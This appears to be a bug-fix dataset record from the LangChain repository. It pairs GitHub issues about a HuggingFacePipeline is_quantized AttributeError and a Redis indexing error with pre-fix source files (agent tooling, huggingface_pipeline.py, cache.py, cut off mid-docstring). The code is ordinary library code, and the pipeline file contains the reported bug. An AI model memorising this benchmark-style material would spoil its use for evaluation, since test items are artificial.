NotImplementedError() class RequestsDeleteToolWithParsing(BaseRequestsTool, BaseTool): """A tool that sends a DELETE request and parses the response.""" name: str = "requests_delete" """The name of the tool.""" description = REQUESTS_DELETE_TOOL_DESCRIPTION """The description of the tool.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """The maximum length of the response.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_DELETE_PROMPT) ) """The LLM chain used to parse the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.delete(data["url"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() # # Orchestrator, planner, controller. # def _create_api_planner_tool( api_spec: ReducedOpenAPISpec, llm: BaseLanguageModel ) -> Tool: endpoint_descriptions = [ f"{name} {description}" for name, description, _ in api_spec.endpoints ] prompt = PromptTemplate( template=API_PLANNER_PROMPT, input_variables=["query"], partial_variables={"endpoints": "- " + "- ".join(endpoint_descriptions)}, ) chain = LLMChain(llm=llm, prompt=prompt) tool = Tool( name=API_PLANNER_TOOL_NAME, description=API_PLANNER_TOOL_DESCRIPTION, func=chain.run, ) return tool def _create_api_controller_agent( api_url: str, api_docs: str, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, ) -> AgentExecutor: get_llm_chain = LLMChain(llm=llm, prompt=PARSING_GET_PROMPT) post_llm_chain = LLMChain(llm=llm, prompt=PARSING_POST_PROMPT) tools: List[BaseTool] = [ RequestsGetToolWithParsing( requests_wrapper=requests_wrapper, llm_chain=get_llm_chain ), RequestsPostToolWithParsing( requests_wrapper=requests_wrapper, llm_chain=post_llm_chain ), ] prompt = PromptTemplate( template=API_CONTROLLER_PROMPT, input_variables=["input", "agent_scratchpad"], partial_variables={ "api_url": api_url, "api_docs": api_docs, "tool_names": ", ".join([tool.name for tool in tools]), "tool_descriptions": "\n".join( [f"{tool.name}: {tool.description}" for tool in tools] ), }, ) agent = ZeroShotAgent( llm_chain=LLMChain(llm=llm, prompt=prompt), allowed_tools=[tool.name for tool in tools], ) return AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True) def _create_api_controller_tool( api_spec: ReducedOpenAPISpec, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, ) -> Tool: """Expose controller as a tool. The tool is invoked with a plan from the planner, and dynamically creates a controller agent with relevant documentation only to constrain the context. """ base_url = api_spec.servers[0]["url"] # TODO: do better. def _create_and_run_api_controller_agent(plan_str: str) -> str: pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*" matches = re.findall(pattern, plan_str) endpoint_names = [ "{method} {route}".format(method=method, route=route.split("?")[0]) for method, route in matches ] endpoint_docs_by_name = {name: docs for name, _, docs in api_spec.endpoints} docs_str = "" for endpoint_name in endpoint_names: docs = endpoint_docs_by_name.get(endpoint_name) if not docs: raise ValueError(f"{endpoint_name} endpoint does not exist.") docs_str += f"== Docs for {endpoint_name} == \n{yaml.dump(docs)}\n" agent = _create_api_controller_agent(base_url, docs_str, requests_wrapper, llm) return agent.run(plan_str) return Tool( name=API_CONTROLLER_TOOL_NAME, func=_create_and_run_api_controller_agent, description=API_CONTROLLER_TOOL_DESCRIPTION, ) def create_openapi_agent( api_spec: ReducedOpenAPISpec, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, shared_memory: Optional[ReadOnlySharedMemory] = None, callback_manager: Optional[BaseCallbackManager] = None, verbose: bool = True, agent_executor_kwargs: Optional[Dict[str, Any]] = None, **kwargs: Dict[str, Any], ) -> AgentExecutor: """Instantiate OpenAI API planner and controller for a given spec. Inject credentials via requests_wrapper. We use a top-level "orchestrator" agent to invoke the planner and controller, rather than a top-level planner that invokes a controller with its plan. This is to keep the planner simple. """ tools = [ _create_api_planner_tool(api_spec, llm), _create_api_controller_tool(api_spec, requests_wrapper, llm), ] prompt = PromptTemplate( template=API_ORCHESTRATOR_PROMPT, input_variables=["input", "agent_scratchpad"], partial_variables={ "tool_names": ", ".join([tool.name for tool in tools]), "tool_descriptions": "\n".join( [f"{tool.name}: {tool.description}" for tool in tools] ), }, ) agent = ZeroShotAgent( llm_chain=LLMChain(llm=llm, prompt=prompt, memory=shared_memory), allowed_tools=[tool.name for tool in tools], **kwargs, ) return AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, callback_manager=callback_manager, verbose=verbose, **(agent_executor_kwargs or {}), )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,809
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### System Info LangChain: langchain-0.0.314 Python: Anaconda Python 3.9.18 X86 RTX3080 Laptop (16G) CUDA 11.8 cuDNN 8.9.5 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git 2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain 3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine (langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported. warnings.warn( loading LLM... Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it] /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed. warnings.warn( /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed. warnings.warn( Traceback (most recent call last): File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module> model = HuggingFacePipeline.from_model_id(model_id=model_path, File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id model.is_quantized File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__ raise AttributeError("'{}' object has no attribute '{}'".format( AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' ### Expected behavior ![image](https://github.com/langchain-ai/langchain/assets/63148804/b7dc429d-e19b-45fc-ba70-b977b72af9b8)
https://github.com/langchain-ai/langchain/issues/11809
https://github.com/langchain-ai/langchain/pull/11891
efa9ef75c098e23f00f95be73c39ae66fdb1c082
5019f59724b2b6adf840b78019f2581546cb390d
"2023-10-14T13:46:33Z"
python
"2023-10-16T23:54:20Z"
libs/langchain/langchain/llms/huggingface_pipeline.py
from __future__ import annotations import importlib.util import logging from typing import Any, List, Mapping, Optional from langchain.callbacks.manager import CallbackManagerForLLMRun from langchain.llms.base import BaseLLM from langchain.llms.utils import enforce_stop_tokens from langchain.pydantic_v1 import Extra from langchain.schema import Generation, LLMResult DEFAULT_MODEL_ID = "gpt2" DEFAULT_TASK = "text-generation" VALID_TASKS = ("text2text-generation", "text-generation", "summarization") DEFAULT_BATCH_SIZE = 4 logger = logging.getLogger(__name__) class HuggingFacePipeline(BaseLLM): """HuggingFace Pipeline API. To use, you should have the ``transformers`` python package installed. Only supports `text-generation`, `text2text-generation` and `summarization` for now. Example using from_model_id: .. code-block:: python from langchain.llms import HuggingFacePipeline hf = HuggingFacePipeline.from_model_id( model_id="gpt2", task="text-generation", pipeline_kwargs={"max_new_tokens": 10}, ) Example passing pipeline in directly: .. code-block:: python from langchain.llms import HuggingFacePipeline from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline model_id = "gpt2" tokenizer = AutoTokenizer.from_pretrained(model_id) model = AutoModelForCausalLM.from_pretrained(model_id) pipe = pipeline( "text-generation", model=model, tokenizer=tokenizer, max_new_tokens=10 ) hf = HuggingFacePipeline(pipeline=pipe) """ pipeline: Any #: :meta private: model_id: str = DEFAULT_MODEL_ID """Model name to use.""" model_kwargs: Optional[dict] = None """Keyword arguments passed to the model.""" pipeline_kwargs: Optional[dict] = None """Keyword arguments passed to the pipeline.""" batch_size: int = DEFAULT_BATCH_SIZE """Batch size to use when passing multiple documents to generate.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @classmethod def from_model_id( cls, model_id: str, task: str, device: Optional[int] = -1, model_kwargs: Optional[dict] = None, pipeline_kwargs: Optional[dict] = None, batch_size: int = DEFAULT_BATCH_SIZE, **kwargs: Any, ) -> HuggingFacePipeline: """Construct the pipeline object from model_id and task.""" try: from transformers import ( AutoModelForCausalLM, AutoModelForSeq2SeqLM, AutoTokenizer, ) from transformers import pipeline as hf_pipeline except ImportError: raise ValueError( "Could not import transformers python package. " "Please install it with `pip install transformers`." ) _model_kwargs = model_kwargs or {} tokenizer = AutoTokenizer.from_pretrained(model_id, **_model_kwargs) try: if task == "text-generation": model = AutoModelForCausalLM.from_pretrained(model_id, **_model_kwargs) elif task in ("text2text-generation", "summarization"): model = AutoModelForSeq2SeqLM.from_pretrained(model_id, **_model_kwargs) else: raise ValueError( f"Got invalid task {task}, " f"currently only {VALID_TASKS} are supported" ) except ImportError as e: raise ValueError( f"Could not load the {task} model due to missing dependencies." ) from e if ( model.is_quantized or model.model.is_loaded_in_4bit or model.model.is_loaded_in_8bit ) and device is not None: logger.warning( f"Setting the `device` argument to None from {device} to avoid " "the error caused by attempting to move the model that was already " "loaded on the GPU using the Accelerate module to the same or " "another device." ) device = None if device is not None and importlib.util.find_spec("torch") is not None: import torch cuda_device_count = torch.cuda.device_count() if device < -1 or (device >= cuda_device_count): raise ValueError( f"Got device=={device}, " f"device is required to be within [-1, {cuda_device_count})" ) if device < 0 and cuda_device_count > 0: logger.warning( "Device has %d GPUs available. " "Provide device={deviceId} to `from_model_id` to use available" "GPUs for execution. deviceId is -1 (default) for CPU and " "can be a positive integer associated with CUDA device id.", cuda_device_count, ) if "trust_remote_code" in _model_kwargs: _model_kwargs = { k: v for k, v in _model_kwargs.items() if k != "trust_remote_code" } _pipeline_kwargs = pipeline_kwargs or {} pipeline = hf_pipeline( task=task, model=model, tokenizer=tokenizer, device=device, batch_size=batch_size, model_kwargs=_model_kwargs, **_pipeline_kwargs, ) if pipeline.task not in VALID_TASKS: raise ValueError( f"Got invalid task {pipeline.task}, " f"currently only {VALID_TASKS} are supported" ) return cls( pipeline=pipeline, model_id=model_id, model_kwargs=_model_kwargs, pipeline_kwargs=_pipeline_kwargs, batch_size=batch_size, **kwargs, ) @property def _identifying_params(self) -> Mapping[str, Any]: """Get the identifying parameters.""" return { "model_id": self.model_id, "model_kwargs": self.model_kwargs, "pipeline_kwargs": self.pipeline_kwargs, } @property def _llm_type(self) -> str: return "huggingface_pipeline" def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: # List to hold all results text_generations: List[str] = [] for i in range(0, len(prompts), self.batch_size): batch_prompts = prompts[i : i + self.batch_size] # Process batch of prompts responses = self.pipeline(batch_prompts) # Process each response in the batch for j, response in enumerate(responses): if isinstance(response, list): # if model returns multiple generations, pick the top one response = response[0] if self.pipeline.task == "text-generation": try: from transformers.pipelines.text_generation import ReturnType remove_prompt = ( self.pipeline._postprocess_params.get("return_type") != ReturnType.NEW_TEXT ) except Exception as e: logger.warning( f"Unable to extract pipeline return_type. " f"Received error:\n\n{e}" ) remove_prompt = True if remove_prompt: text = response["generated_text"][len(batch_prompts[j]) :] else: text = response["generated_text"] elif self.pipeline.task == "text2text-generation": text = response["generated_text"] elif self.pipeline.task == "summarization": text = response["summary_text"] else: raise ValueError( f"Got invalid task {self.pipeline.task}, " f"currently only {VALID_TASKS} are supported" ) if stop: # Enforce stop tokens text = enforce_stop_tokens(text, stop) # Append the processed text to results text_generations.append(text) return LLMResult( generations=[[Generation(text=text)] for text in text_generations] )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,197
Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"]
### System Info Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index". You'll get this exception while using redis as retriever: ![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2) ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06) The error is here: ![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece) If you look for the index you'll get (empty list or set). This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason. I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps. ### Expected behavior Expected behavior inside Redis: "docs:indexname_:12ss2sadd"
https://github.com/langchain-ai/langchain/issues/11197
https://github.com/langchain-ai/langchain/pull/11257
079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a
d5c2ce7c2e1179907400f2c96fc6309a54cbce6a
"2023-09-28T19:57:36Z"
python
"2023-10-24T17:51:25Z"
libs/langchain/langchain/cache.py
""" .. warning:: Beta Feature! **Cache** provides an optional caching layer for LLMs. Cache is useful for two reasons: - It can save you money by reducing the number of API calls you make to the LLM provider if you're often requesting the same completion multiple times. - It can speed up your application by reducing the number of API calls you make to the LLM provider. Cache directly competes with Memory. See documentation for Pros and Cons. **Class hierarchy:** .. code-block:: BaseCache --> <name>Cache # Examples: InMemoryCache, RedisCache, GPTCache """ from __future__ import annotations import hashlib import inspect import json import logging import uuid import warnings from datetime import timedelta from functools import lru_cache from typing import ( TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Type, Union, cast, ) from sqlalchemy import Column, Integer, Row, String, create_engine, select from sqlalchemy.engine.base import Engine from sqlalchemy.orm import Session try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.llms.base import LLM, get_prompts from langchain.load.dump import dumps from langchain.load.load import loads from langchain.schema import ChatGeneration, Generation from langchain.schema.cache import RETURN_VAL_TYPE, BaseCache from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_env from langchain.vectorstores.redis import Redis as RedisVectorstore logger = logging.getLogger(__file__) if TYPE_CHECKING: import momento from cassandra.cluster import Session as CassandraSession def _hash(_input: str) -> str: """Use a deterministic hashing approach.""" return hashlib.md5(_input.encode()).hexdigest() def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str: """Dump generations to json. Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: Json representing a list of generations. Warning: would not work well with arbitrary subclasses of `Generation` """ return json.dumps([generation.dict() for generation in generations]) def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE: """Load generations from json. Args: generations_json (str): A string of json representing a list of generations. Raises: ValueError: Could not decode json string to list of generations. Returns: RETURN_VAL_TYPE: A list of generations. Warning: would not work well with arbitrary subclasses of `Generation` """ try: results = json.loads(generations_json) return [Generation(**generation_dict) for generation_dict in results] except json.JSONDecodeError: raise ValueError( f"Could not decode json to list of generations: {generations_json}" ) def _dumps_generations(generations: RETURN_VAL_TYPE) -> str: """ Serialization for generic RETURN_VAL_TYPE, i.e. sequence of `Generation` Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: a single string representing a list of generations. This function (+ its counterpart `_loads_generations`) rely on the dumps/loads pair with Reviver, so are able to deal with all subclasses of Generation. Each item in the list can be `dumps`ed to a string, then we make the whole list of strings into a json-dumped. """ return json.dumps([dumps(_item) for _item in generations]) def _loads_generations(generations_str: str) -> Union[RETURN_VAL_TYPE, None]: """ Deserialization of a string into a generic RETURN_VAL_TYPE (i.e. a sequence of `Generation`). See `_dumps_generations`, the inverse of this function. Args: generations_str (str): A string representing a list of generations. Compatible with the legacy cache-blob format Does not raise exceptions for malformed entries, just logs a warning and returns none: the caller should be prepared for such a cache miss. Returns: RETURN_VAL_TYPE: A list of generations. """ try: generations = [loads(_item_str) for _item_str in json.loads(generations_str)] return generations except (json.JSONDecodeError, TypeError): # deferring the (soft) handling to after the legacy-format attempt pass try: gen_dicts = json.loads(generations_str) # not relying on `_load_generations_from_json` (which could disappear): generations = [Generation(**generation_dict) for generation_dict in gen_dicts] logger.warning( f"Legacy 'Generation' cached blob encountered: '{generations_str}'" ) return generations except (json.JSONDecodeError, TypeError): logger.warning( f"Malformed/unparsable cached blob encountered: '{generations_str}'" ) return None class InMemoryCache(BaseCache): """Cache that stores things in memory.""" def __init__(self) -> None: """Initialize with empty cache.""" self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {} def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" return self._cache.get((prompt, llm_string), None) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" self._cache[(prompt, llm_string)] = return_val def clear(self, **kwargs: Any) -> None: """Clear cache.""" self._cache = {} Base = declarative_base() class FullLLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_llm_cache" prompt = Column(String, primary_key=True) llm = Column(String, primary_key=True) idx = Column(Integer, primary_key=True) response = Column(String) class SQLAlchemyCache(BaseCache): """Cache that uses SQAlchemy as a backend.""" def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): """Initialize by creating all tables.""" self.engine = engine self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt == prompt) # type: ignore .where(self.cache_schema.llm == llm_string) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: rows = session.execute(stmt).fetchall() if rows: try: return [loads(row[0]) for row in rows] except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. return [Generation(text=row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" items = [ self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.query(self.cache_schema).delete() session.commit() class SQLiteCache(SQLAlchemyCache): """Cache that uses SQLite as a backend.""" def __init__(self, database_path: str = ".langchain.db"): """Initialize by creating the engine and all tables.""" engine = create_engine(f"sqlite:///{database_path}") super().__init__(engine) class UpstashRedisCache(BaseCache): """Cache that uses Upstash Redis as a backend.""" def __init__(self, redis_: Any, *, ttl: Optional[int] = None): """ Initialize an instance of UpstashRedisCache. This method initializes an object with Upstash Redis caching capabilities. It takes a `redis_` parameter, which should be an instance of an Upstash Redis client class, allowing the object to interact with Upstash Redis server for caching purposes. Parameters: redis_: An instance of Upstash Redis client class (e.g., Redis) used for caching. This allows the object to communicate with Redis server for caching operations on. ttl (int, optional): Time-to-live (TTL) for cached items in seconds. If provided, it sets the time duration for how long cached items will remain valid. If not provided, cached items will not have an automatic expiration. """ try: from upstash_redis import Redis except ImportError: raise ValueError( "Could not import upstash_redis python package. " "Please install it with `pip install upstash_redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Upstash Redis object.") self.redis = redis_ self.ttl = ttl def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "UpstashRedisCache supports caching of normal LLM generations, " f"got {type(gen)}" ) if isinstance(gen, ChatGeneration): warnings.warn( "NOTE: Generation has not been cached. UpstashRedisCache does not" " support caching ChatModel outputs." ) return # Write to a HASH key = self._key(prompt, llm_string) mapping = { str(idx): generation.text for idx, generation in enumerate(return_val) } self.redis.hset(key=key, values=mapping) if self.ttl is not None: self.redis.expire(key, self.ttl) def clear(self, **kwargs: Any) -> None: """ Clear cache. If `asynchronous` is True, flush asynchronously. This flushes the *whole* db. """ asynchronous = kwargs.get("asynchronous", False) if asynchronous: asynchronous = "ASYNC" else: asynchronous = "SYNC" self.redis.flushdb(flush_type=asynchronous) class RedisCache(BaseCache): """Cache that uses Redis as a backend.""" def __init__(self, redis_: Any, *, ttl: Optional[int] = None): """ Initialize an instance of RedisCache. This method initializes an object with Redis caching capabilities. It takes a `redis_` parameter, which should be an instance of a Redis client class, allowing the object to interact with a Redis server for caching purposes. Parameters: redis_ (Any): An instance of a Redis client class (e.g., redis.Redis) used for caching. This allows the object to communicate with a Redis server for caching operations. ttl (int, optional): Time-to-live (TTL) for cached items in seconds. If provided, it sets the time duration for how long cached items will remain valid. If not provided, cached items will not have an automatic expiration. """ try: from redis import Redis except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Redis object.") self.redis = redis_ self.ttl = ttl def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a Redis HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): try: generations.append(loads(text)) except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) # Write to a Redis HASH key = self._key(prompt, llm_string) with self.redis.pipeline() as pipe: pipe.hset( key, mapping={ str(idx): dumps(generation) for idx, generation in enumerate(return_val) }, ) if self.ttl is not None: pipe.expire(key, self.ttl) pipe.execute() def clear(self, **kwargs: Any) -> None: """Clear cache. If `asynchronous` is True, flush asynchronously.""" asynchronous = kwargs.get("asynchronous", False) self.redis.flushdb(asynchronous=asynchronous, **kwargs) class RedisSemanticCache(BaseCache): """Cache that uses Redis as a vector-store backend.""" # TODO - implement a TTL policy in Redis DEFAULT_SCHEMA = { "content_key": "prompt", "text": [ {"name": "prompt"}, ], "extra": [{"name": "return_val"}, {"name": "llm_string"}], } def __init__( self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2 ): """Initialize by passing in the `init` GPTCache func Args: redis_url (str): URL to connect to Redis. embedding (Embedding): Embedding provider for semantic encoding and search. score_threshold (float, 0.2): Example: .. code-block:: python from langchain.globals import set_llm_cache from langchain.cache import RedisSemanticCache from langchain.embeddings import OpenAIEmbeddings set_llm_cache(RedisSemanticCache( redis_url="redis://localhost:6379", embedding=OpenAIEmbeddings() )) """ self._cache_dict: Dict[str, RedisVectorstore] = {} self.redis_url = redis_url self.embedding = embedding self.score_threshold = score_threshold def _index_name(self, llm_string: str) -> str: hashed_index = _hash(llm_string) return f"cache:{hashed_index}" def _get_llm_cache(self, llm_string: str) -> RedisVectorstore: index_name = self._index_name(llm_string) # return vectorstore client for the specific llm string if index_name in self._cache_dict: return self._cache_dict[index_name] # create new vectorstore client for the specific llm string try: self._cache_dict[index_name] = RedisVectorstore.from_existing_index( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, schema=cast(Dict, self.DEFAULT_SCHEMA), ) except ValueError: redis = RedisVectorstore( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, index_schema=cast(Dict, self.DEFAULT_SCHEMA), ) _embedding = self.embedding.embed_query(text="test") redis._create_index(dim=len(_embedding)) self._cache_dict[index_name] = redis return self._cache_dict[index_name] def clear(self, **kwargs: Any) -> None: """Clear semantic cache for a given llm_string.""" index_name = self._index_name(kwargs["llm_string"]) if index_name in self._cache_dict: self._cache_dict[index_name].drop_index( index_name=index_name, delete_documents=True, redis_url=self.redis_url ) del self._cache_dict[index_name] def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" llm_cache = self._get_llm_cache(llm_string) generations: List = [] # Read from a Hash results = llm_cache.similarity_search( query=prompt, k=1, distance_threshold=self.score_threshold, ) if results: for document in results: try: generations.extend(loads(document.metadata["return_val"])) except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. generations.extend( _load_generations_from_json(document.metadata["return_val"]) ) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisSemanticCache only supports caching of " f"normal LLM generations, got {type(gen)}" ) llm_cache = self._get_llm_cache(llm_string) metadata = { "llm_string": llm_string, "prompt": prompt, "return_val": dumps([g for g in return_val]), } llm_cache.add_texts(texts=[prompt], metadatas=[metadata]) class GPTCache(BaseCache): """Cache that uses GPTCache as a backend.""" def __init__( self, init_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = None, ): """Initialize by passing in init function (default: `None`). Args: init_func (Optional[Callable[[Any], None]]): init `GPTCache` function (default: `None`) Example: .. code-block:: python # Initialize GPTCache with a custom init function import gptcache from gptcache.processor.pre import get_prompt from gptcache.manager.factory import get_data_manager from langchain.globals import set_llm_cache # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: gptcache.Cache, llm str): cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory( manager="map", data_dir=f"map_cache_{llm}" ), ) set_llm_cache(GPTCache(init_gptcache)) """ try: import gptcache # noqa: F401 except ImportError: raise ImportError( "Could not import gptcache python package. " "Please install it with `pip install gptcache`." ) self.init_gptcache_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = init_func self.gptcache_dict: Dict[str, Any] = {} def _new_gptcache(self, llm_string: str) -> Any: """New gptcache object""" from gptcache import Cache from gptcache.manager.factory import get_data_manager from gptcache.processor.pre import get_prompt _gptcache = Cache() if self.init_gptcache_func is not None: sig = inspect.signature(self.init_gptcache_func) if len(sig.parameters) == 2: self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg] else: self.init_gptcache_func(_gptcache) # type: ignore[call-arg] else: _gptcache.init( pre_embedding_func=get_prompt, data_manager=get_data_manager(data_path=llm_string), ) self.gptcache_dict[llm_string] = _gptcache return _gptcache def _get_gptcache(self, llm_string: str) -> Any: """Get a cache object. When the corresponding llm model cache does not exist, it will be created.""" _gptcache = self.gptcache_dict.get(llm_string, None) if not _gptcache: _gptcache = self._new_gptcache(llm_string) return _gptcache def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up the cache data. First, retrieve the corresponding cache object using the `llm_string` parameter, and then retrieve the data from the cache based on the `prompt`. """ from gptcache.adapter.api import get _gptcache = self._get_gptcache(llm_string) res = get(prompt, cache_obj=_gptcache) if res: return [ Generation(**generation_dict) for generation_dict in json.loads(res) ] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache. First, retrieve the corresponding cache object using the `llm_string` parameter, and then store the `prompt` and `return_val` in the cache object. """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "GPTCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) from gptcache.adapter.api import put _gptcache = self._get_gptcache(llm_string) handled_data = json.dumps([generation.dict() for generation in return_val]) put(prompt, handled_data, cache_obj=_gptcache) return None def clear(self, **kwargs: Any) -> None: """Clear 